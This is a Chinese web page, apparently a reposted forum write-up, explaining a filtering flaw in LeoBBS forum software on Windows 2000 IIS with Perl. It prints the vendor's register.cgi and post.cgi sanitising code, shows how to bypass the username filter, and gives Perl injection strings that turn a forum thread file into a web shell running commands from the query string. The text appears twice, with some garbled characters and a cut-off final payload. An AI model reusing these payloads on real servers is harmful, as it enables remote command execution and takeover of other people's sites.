雷傲论坛过滤不严漏洞

网络技术是从1990年代中期发展起来的新技术，它把互联网上分散的资源融为有机整体，实现资源的全面共享和有机协作，使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。当前的互联网只限于信息共享，网络则被认为是互联网发展的第三阶段。

[zt]雷傲论坛过滤不严漏洞

第一次写这些东西，欢迎大家拍砖~

适用版本 leoBBS X 论坛一般都存在的漏洞（测试了几个，都有的）~
适用系统 win2000+ iis
cgi 解析方式 perl.exe %s %s ,perlis.dll

漏洞原理：
利用了对用户输入的过滤不严，编写代码，从而获得shell。
结合利用register.cgi 和post.cgi 过滤不严。

1、看下lb 论坛的register.cgi注册中的过滤，

for ('inmembername'...)
$tp = $query->param($_);
$tp = &unHTML("$tp");
${$_} = $tp;
}

sub unHTML {} 里面的东西不重要。

&error("用户注册&对不起，您输入的用户名有问题，请不要在用户名中包含\@\#\$\%\^\*\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]这类字符！") if ($inmembername =~ /[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]/);
if($inmembername =~ /_/) { &error("用户注册&请不要在用户名中使用下划线！"); }

$inmembername =~ s/\ \;//ig;
$inmembername =~ s// /g;
$inmembername =~ s// /g;
$inmembername =~ s/[ ]+/ /g;
$inmembername =~ s/[ ]+/_/;
$inmembername =~ s/[_]+/_/;
$inmembername =~ s/�//isg;
$inmembername =~ s///isg;
$inmembername =~ s///isg;
$inmembername =~ s///isg;
$inmembername =~ s/()+//isg;
$inmembername =~ s/[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\*\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
$inmembername =~ s/\s*$//g;
$inmembername =~ s/^\s*//g;

&error("用户注册&对不起，您输入的用户名有问题") if ($inmembername =~ /^q(.+?)-/ig);

$inmembername =~ /guest/i)
($inmembername =~ /qq-/i)
($inmembername =~ /q-/i)
($inmembername =~ /qx-/i)
($inmembername =~ /qw-/i)
($inmembername =~ /qr-/i)
($inmembername =~ /no)
($inmembername eq "admin")
($inmembername display/i)
($inmembername =~ /^system/i)
($inmembername =~ /---/ieq "root")
($inmembername eq "copy")
($inmembername =~ /^sub/)
($inmembername =~ /^exec/)
($inmembername =~ /\@ARGV/i)
($inmembername =~ /^require/)
($inmembername =~ /^rename/i)
($inmembername =~ /^dir/i)
($inmembername =~ /^print/i)
($inmembername =~ /^con/i)
($inmembername =~ /^nul/i)
($inmembername =~ /^aux/i)
($inmembername =~ /^com/i)
($inmembername =~ /^lpt/i));

等等。

过滤的挺彻底的哦~

但是忽略了 q及 qq、qw等的运用还可以用些特殊的符号的：馐亲罟丶囊徊健?br />
2、再看下post.cgi里对发贴的过滤

for ('forum','topic','membername','password','action','postno','inshowsignature',
'notify','inshowemoticons','intopictitle','inshowchgfont',
'inpost','posticon','inhiddentopic','postweiwang','moneyhidden','moneypost','uselbcode','inwater') {
next unless defined $_;
next if $_ eq 'SEND_MAIL';
$tp = $query->param($_);
$tp = &cleaninput("$tp");
${$_} = $tp;
}

sub cleaninput {
my ($self, $text) = _self_or_default(@_);
# my $text = shift;
study($text);
$text =~ s/[\a\f\e\0\r\t]//isg;
$text =~ s/\ / /g;
$text =~ s/\@ARGV/\&\#64\;ARGV/isg;
$text =~ s/\;/\&\#59\;/isg;
$text =~ s/\&/\&/g;
$text =~ s/\&\#/\&\#/isg;
$text =~ s/\&\;(.{1,6})\&\#59\;/\&$1\;/isg;
$text =~ s/\&\#([0-9]{1,6})\&\#59\;/\&\#$1\;/isg;
$text =~ s/"/\"/g;
$text =~ s/ / \ /g;
$text =~ s/</\</g;
$text =~ s/>/\>/g;
$text =~ s/ / /g;
$text =~ s/\n\n/<p>/g;
$text =~ s/\n/<br>/g;
$text =~ s/document.cookie/documents\&\#46\;cookie/isg;
$text =~ s/'/\&\#039\;/g;
$text =~ s/#/#/isg;
$text =~ s/&#/&#/isg;
return $text;
}

只要编写的代码饶过上面的过滤能运行，就可以的。

3、如此针对win2000的机子可以有下面的方法取的shell的
用perl.exe 解析的话

用 q€q 为用户名注册 € 后面随意写，自然也可以用别的符号的，
他可不是用 s/\`\~\!\@\#\$\%\^\&\*\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg;
~ /^q(.+?)-/ig

($inmembername =~ /qq-/i)
($inmembername =~ /q-/i)
($inmembername =~ /qx-/i)
($inmembername =~ /qw-/i)
($inmembername =~ /qr-/i)
就能全部过滤掉的：）。

接着只要在发贴的内容中写入

€ and ($_=$ENV{QUERY_STRING}) and (s/%20/ /ig) and ($out=`$_`) and (print $out)

该forum下*.thd.cgi 就是个简单的shell了。

用 perlis.dll解析的话，构造好的话，也能实现目的的。（试了下，可以用
€ and($cmd=q-dir ..- )and ($t=q-1.rar- )and (@s=`$cmd`) and sysopen(AA,$t,1

关键词：雷傲论坛过滤不严漏洞

争怎路由网：是一个主要分享无线路由器安装设置经验的网站，汇总WiFi常见问题的解决方法。争怎路由网出厂设置 wifi名称上网参数配置小米上不了网网站首页不能上网路由器密码 WiFi设置路由器设置 TP-Link 腾达路由器软件教程游戏教程系统下载您当前所在位置：下载首页 -> 杀毒教程
雷傲论坛过滤不严漏洞时间：2024/3/21作者：未知来源：争怎路由网人气：11 网络技术是从1990年代中期发展起来的新技术，它把互联网上分散的资源融为有机整体，实现资源的全面共享和有机协作，使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。当前的互联网只限于信息共享，网络则被认为是互联网发展的第三阶段。 [zt]雷傲论坛过滤不严漏洞第一次写这些东西，欢迎大家拍砖~ 适用版本 leoBBS X 论坛一般都存在的漏洞（测试了几个，都有的）~ 适用系统 win2000+ iis cgi 解析方式 perl.exe %s %s ,perlis.dll 漏洞原理：利用了对用户输入的过滤不严，编写代码，从而获得shell。结合利用register.cgi 和post.cgi 过滤不严。 1、看下lb 论坛的register.cgi注册中的过滤， for ('inmembername'...) $tp = $query->param($_); $tp = &unHTML("$tp"); ${$_} = $tp; } sub unHTML {} 里面的东西不重要。 &error("用户注册&对不起，您输入的用户名有问题，请不要在用户名中包含\@\#\$\%\^\\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]这类字符！") if ($inmembername =~ /[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]/); if($inmembername =~ /_/) { &error("用户注册&请不要在用户名中使用下划线！"); } $inmembername =~ s/\ \;//ig; $inmembername =~ s// /g; $inmembername =~ s// /g; $inmembername =~ s/[ ]+/ /g; $inmembername =~ s/[ ]+/_/; $inmembername =~ s/[_]+/_/; $inmembername =~ s/�//isg; $inmembername =~ s///isg; $inmembername =~ s///isg; $inmembername =~ s///isg; $inmembername =~ s/()+//isg; $inmembername =~ s/[\a\f\n\e\0\r\t\`\~\!\@\#\$\%\^\&\\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg; $inmembername =~ s/\s$//g; $inmembername =~ s/^\s//g; &error("用户注册&对不起，您输入的用户名有问题") if ($inmembername =~ /^q(.+?)-/ig); $inmembername =~ /guest/i) ($inmembername =~ /qq-/i) ($inmembername =~ /q-/i) ($inmembername =~ /qx-/i) ($inmembername =~ /qw-/i) ($inmembername =~ /qr-/i) ($inmembername =~ /no) ($inmembername eq "admin") ($inmembername display/i) ($inmembername =~ /^system/i) ($inmembername =~ /---/ieq "root") ($inmembername eq "copy") ($inmembername =~ /^sub/) ($inmembername =~ /^exec/) ($inmembername =~ /\@ARGV/i) ($inmembername =~ /^require/) ($inmembername =~ /^rename/i) ($inmembername =~ /^dir/i) ($inmembername =~ /^print/i) ($inmembername =~ /^con/i) ($inmembername =~ /^nul/i) ($inmembername =~ /^aux/i) ($inmembername =~ /^com/i) ($inmembername =~ /^lpt/i)); 等等。过滤的挺彻底的哦~ 但是忽略了 q及 qq、qw等的运用还可以用些特殊的符号的：馐亲罟丶囊徊健?br /> 2、再看下post.cgi里对发贴的过滤 for ('forum','topic','membername','password','action','postno','inshowsignature', 'notify','inshowemoticons','intopictitle','inshowchgfont', 'inpost','posticon','inhiddentopic','postweiwang','moneyhidden','moneypost','uselbcode','inwater') { next unless defined $_; next if $_ eq 'SEND_MAIL'; $tp = $query->param($_); $tp = &cleaninput("$tp"); ${$_} = $tp; } sub cleaninput { my ($self, $text) = _self_or_default(@_); # my $text = shift; study($text); $text =~ s/[\a\f\e\0\r\t]//isg; $text =~ s/\ / /g; $text =~ s/\@ARGV/\&\#64\;ARGV/isg; $text =~ s/\;/\&\#59\;/isg; $text =~ s/\&/\&/g; $text =~ s/\&\#/\&\#/isg; $text =~ s/\&\;(.{1,6})\&\#59\;/\&$1\;/isg; $text =~ s/\&\#([0-9]{1,6})\&\#59\;/\&\#$1\;/isg; $text =~ s/"/\"/g; $text =~ s/ / \ /g; $text =~ s/</\</g; $text =~ s/>/\>/g; $text =~ s/ / /g; $text =~ s/\n\n/<p>/g; $text =~ s/\n/<br>/g; $text =~ s/document.cookie/documents\&\#46\;cookie/isg; $text =~ s/'/\&\#039\;/g; $text =~ s/#/#/isg; $text =~ s/&#/&#/isg; return $text; } 只要编写的代码饶过上面的过滤能运行，就可以的。 3、如此针对win2000的机子可以有下面的方法取的shell的用perl.exe 解析的话用 q€q 为用户名注册 € 后面随意写，自然也可以用别的符号的，他可不是用 s/\`\~\!\@\#\$\%\^\&\\(\)\+\=\\\{\}\;'\:\"\,\.\/\<\>\?\[\]]//isg; ~ /^q(.+?)-/ig ($inmembername =~ /qq-/i) ($inmembername =~ /q-/i) ($inmembername =~ /qx-/i) ($inmembername =~ /qw-/i) ($inmembername =~ /qr-/i) 就能全部过滤掉的：）。接着只要在发贴的内容中写入 € and ($_=$ENV{QUERY_STRING}) and (s/%20/ /ig) and ($out=`$_`) and (print $out) 该forum下.thd.cgi 就是个简单的shell了。用 perlis.dll解析的话，构造好的话，也能实现目的的。（试了下，可以用 € and($cmd=q-dir ..- )and ($t=q-1.rar- )and (@s=`$cmd`) and sysopen(AA,$t,1 关键词：雷傲论坛过滤不严漏洞*	*软件教程* 聊天工具办公软件杀毒教程系统工具图形图像电脑学习应用软件网络软件苹果应用多媒体区网站教程其它教程技术开发安卓教程 *人气排行* 1Windows 0day EternalBlue(永恒之蓝... 22017好用的公共DNS推荐 3腾讯王卡1元1天宽带活动正式开发办理！ 4学生玩家需谨慎 “身份证生成器”木马来袭 5如何关闭防火墙 6无线网络连接上但上不了网处理方法 7谷歌访问助手Chrome版插件插入方式\|如何使用谷歌访问助... 8是怕不给礼金？伴娘太敬业胸挂二维码 9如何避开ONION勒索软件 ONION勒索软件如何防范 10华平终端端口关闭方法设置说明 *推荐资讯* 1atiesrxx.exe是什么进程？是不是病毒？ 2QQ“隐身对其可见”及“在线对其隐身”的设置技巧 3cooledit音频图文详细教程之混响处理、混缩合成 4用css完成动画是如何完成的？盘点那些css动画技术 5Photoshop圆满打造一元硬币 6Win7系统虚拟内存不能改如何办 7微信美图聊聊添加使用图文详细教程 8紧急冻结微信账号保障财产安全 9iphone x 256g值得买吗苹果iphone x ... 10Win7电脑中插入U盘显示异常如何办？
Copyright © 2012-2018 争怎路由网(http://www.zhengzen.com) .All Rights Reserved 网站地图友情链接免责声明：本站资源均来自互联网收集如有侵犯到您利益的地方请及时联系管理删除，敬请见谅! QQ:1006262270 邮箱:kfyvi376850063@126.com 手机版